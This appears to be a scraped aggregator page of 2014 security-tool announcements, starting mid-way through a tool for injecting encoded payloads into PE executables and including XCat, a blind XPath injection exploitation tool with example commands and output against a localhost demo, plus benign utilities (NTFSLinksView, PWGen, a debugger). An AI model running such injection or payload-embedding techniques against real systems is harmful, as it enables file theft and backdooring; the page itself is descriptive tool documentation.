  •     VirtualAllocEx
  •     VirtualProtect
  •     VirtualProtectEx
  •     HeapCreate/HeapAlloc
  •     LoadLibrary/GetProcAddress
  •     CreateFileMapping/MapViewOfFile

If the target PE file doesn’t import by default the necessary API(s) then  a method wil be shown as ‘N/A’.
If a method requires more than one APIs, like for example method 4, it will also be shown as ‘N/A’ if the PE file doesn’t import all of them.

If none of the encoded payload handler methods supported are available for the current PE target, you can choose to either select a non-encoded payload or to change the section’s characteristics from inside the PE Header.

This last option has been added in order to provide more flexibility to the user in case he still wants to use a specific encoded payload along with the same PE file.


NTFSLinksView - View NTFS symbolic links and junction points

August 11, 2014, 12:29 pm
$
0
0

Starting from Windows Vista, Microsoft uses symbolic links and junction points of NTFS file system in order to make changes in the folders structure of Windows and keep the compatibility of applications written for older versions of Windows. This utility simply shows you a list of all symbolic links and junctions in the specified folder, and their target paths. It also allows you to save the symbolic links/junctions list into text/html/xml/csv file.
Using NTFSLinksView 

NTFSLinksView doesn't require any installation process or additional dll files. In order to start using it, simply run the executable file - NTFSLinksView.exe When you run NTFSLinksView, press the Go button, and then the main window will display the list of all NTFS symbolic links/junction points in your profile folder. If you want to view the NTFS links in other folders, simply type the folder path in the top text-box and press enter (or click the 'Go' button).

If you want to scan your entire drive, type 'C:\' in the folder text box and choose Infinite subfolder depth.


XCat - Tool that aides in the exploitation of blind XPath injection vulnerabilities

August 11, 2014, 4:45 pm
$
0
0
XCat is a command line program that aides in the exploitation of blind XPath injection vulnerabilities. It can be used to retrieve the whole XML document being processed by a vulnerable XPath query, read arbitrary files on the hosts filesystem and utilize out of bound HTTP requests to make the server send data directly to xcat.

XCat is built to exploit boolean XPath injections (Where only one bit of data can be extracted in one request) and it requires you to manually identify the exploit first, this does not do that for you.

Features
  • Exploits both GET and POST attacks
  • Extracts all nodes, comments, attributes and data from the entire XML document
  • Small and lightweight (only a few pure-python dependencies)
  • Parallel requests
  • XPath 2.0 supported (with graceful degrading to 1.0)
  • Advanced data postback through HTTP (see below)
  • Arbitrarily read XML files on the servers file system via the doc() function (see below)
  • Arbitrarily read text files on the servers file system via crafted SYSTEM entities

Examples
If you run a windows machine you can install Jython and start the example application (example_application/ironpython_site.py). The syntax for a simple command you can execute against this server is:
xcat --method=GET http://localhost:8080 title=Foundation title "1 results found" run retrieve

This command specifies the HTTP method (GET), target URL (our localhost server), the GET or POST) data to send (title=Bible), the vulnerable parameter (title) and a string to indicate a true response (Book found). Executing this will retrieve the entire XML file being queried.
>> xcat --method=GET http://localhost:8080 title=Foundation title "1 results found" run retrieve
Injecting using FunctionCall
Detecting features...
Supported features: String to codepoints, XPath 2, Read local XML files, Substring search speedup
Retrieving /*[1]
<?xml version="1.0" encoding="utf-8"?>
<library>
<rentals>
<books>
<!-- A comment -->
<book>
...

The the retrieval of documents can be sped up in a number of different ways, such as using the doc function to make the server send data directly to XCat (explained in more detail below). Each of the techniques is called a feature and can be viewed by using the test_injection command. This will display information about the injection, including the type (integer, string, path name) and various features that XCat has is able to use. XCat knows which features are best and will gracefully degrade if they fail for any reason.
>> xcat --method=GET --public-ip="localhost" http://localhost:8080 title=Foundation title "1 results found" test_injection
Testing parameter title:
FunctionCallInjection:          /lib/something[function(?)]
    - EfficientSubstringSearch
    - OOBDocFeature
    - CodepointSearch
    - XPath2
    - DocFeature
    - EntityInjection


PWGen - Generator of cryptographically-strong passwords

August 11, 2014, 4:53 pm
$
0
0

PWGen is a professional password generator capable of creating large amounts of cryptographically-secure passwords or passphrases consisting of words from a word list. It uses a “random pool” technique to generate random data based on user inputs (keystrokes, mouse handling) and volatile system parameters. PWGen provides lots of options to customize passwords to the users’ various needs. Additionally, it offers strong text encryption and the creation of random data files (e.g., key files).

Notable Features
  • Free and Open-Source software
  • Unicode support
  • Unobtrusive: easy to use, doesn’t install any weird DLL files, doesn’t write to the Windows registry, doesn’t even write to your hard disk if you don’t want it, can be uninstalled easily
  • Uses up-to-date cryptography (AES, SHA-2) to generate random data for high-quality passwords
  • Numerous password options for various purposes
  • Generation of large amounts of passwords at once
  • Generation of passphrases composed of words from a word list
  • Pattern-based password generation (formatted passwords) provides nearly endless possibilities to customize passwords to the user’s needs
  • “Password hasher” functionality: Generate passwords based on a master password and a parameter string (e.g., the name of a website), similar to “Hashapass”
  • Secure text encryption
  • Multilingual support
  • In-depth manual (49 pages)
  • Runs on all Windows versions (32-bit and 64-bit; beginning with Windows 95 OEM Service Release 2)

SimpleProgramDebugger - Simple program debugger that shows all debug events

August 12, 2014, 4:36 pm
$
0
0

SimpleProgramDebugger is a simple debugging tool for Windows that attaches to existing running program or starts a new program in debugging mode, and then displays all major debugging events occurs while the program is running, including Exception, Create Thread, Create Process, Exit Thread, Exit Process, Load DLL, Unload Dll, and Debug String.

After the debugging events are accumulated, you can easily export them into comma-delimited/tab-delimited/xml/html file or copy them to the clipboard and then paste them into Excel or any other spreadsheet application.

Start Using SimpleProgramDebugger

SimpleProgramDebugger doesn't require any installation process or additional dll files. In order to start using it, simply run the executable file - SimpleProgramDebugger.exe After running SimpleProgramDebugger, you can attach a program that is already running by pressing F7 and choosing the desired process, or you can start a new program by pressing Ctrl+N and choosing the .exe file to run, and optionally parameters and start folder.

After the debugging events are displayed in the main window of SimpleProgramDebugger, you can select one or more events, and then use the 'Save Selected items' option to export them into comma-delimited/tab-delimited/xml/html file or press Ctrl+C to copy them to the clipboard, and then paste them into Excel or any other spreadsheet application. 


Viewing all 5816 articles
Browse latest View live
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>